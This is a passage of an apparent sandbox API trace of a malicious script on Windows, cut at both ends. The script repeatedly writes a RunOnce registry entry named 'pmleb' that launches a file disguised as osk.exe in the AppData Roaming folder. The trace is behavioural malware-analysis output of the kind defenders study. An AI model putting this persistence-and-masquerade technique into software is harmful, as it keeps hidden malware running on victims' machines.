out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.707] IUnknown:Release (This=0x787518) returned 0x1 [0079.707] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.707] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.707] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.707] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.708] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4c [0079.708] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.708] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4d [0079.708] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.708] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4c [0079.709] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.709] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.709] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.709] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.709] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.709] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.712] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.712] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.712] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.712] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.712] RegCloseKey (hKey=0x280) returned 0x0 [0079.712] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.712] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.713] SetTimer (hWnd=0x20280, nIDEvent=0x204c, uElapse=0xa, lpTimerFunc=0x0) returned 0x204c [0079.713] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.721] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.721] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.722] KillTimer (hWnd=0x20280, uIDEvent=0x204c) returned 1 [0079.722] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.722] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.722] IUnknown:Release (This=0x787518) returned 0x1 [0079.722] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.722] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.722] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.722] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.722] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.722] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.722] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.722] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.723] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.723] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4d [0079.723] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.723] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4e [0079.723] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.723] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4d [0079.724] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.724] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.724] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.724] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.724] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.724] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.724] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.724] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.724] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.724] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.726] RegCloseKey (hKey=0x280) returned 0x0 [0079.726] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.726] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.726] SetTimer (hWnd=0x20280, nIDEvent=0x204d, uElapse=0xa, lpTimerFunc=0x0) returned 0x204d [0079.726] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.737] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.737] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.738] KillTimer (hWnd=0x20280, uIDEvent=0x204d) returned 1 [0079.738] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.738] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.738] IUnknown:Release (This=0x787518) returned 0x1 [0079.738] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.738] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.738] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.738] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.738] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.738] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.738] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.739] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.739] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.739] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4e [0079.739] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.739] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4f [0079.739] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.739] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4e [0079.740] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.740] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.740] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.740] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.740] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.740] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.740] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.740] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.740] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.740] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.740] RegCloseKey (hKey=0x280) returned 0x0 [0079.740] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.741] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.741] SetTimer (hWnd=0x20280, nIDEvent=0x204e, uElapse=0xa, lpTimerFunc=0x0) returned 0x204e [0079.741] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.753] TranslateMessage (lpMsg=0x33f7fc) returned 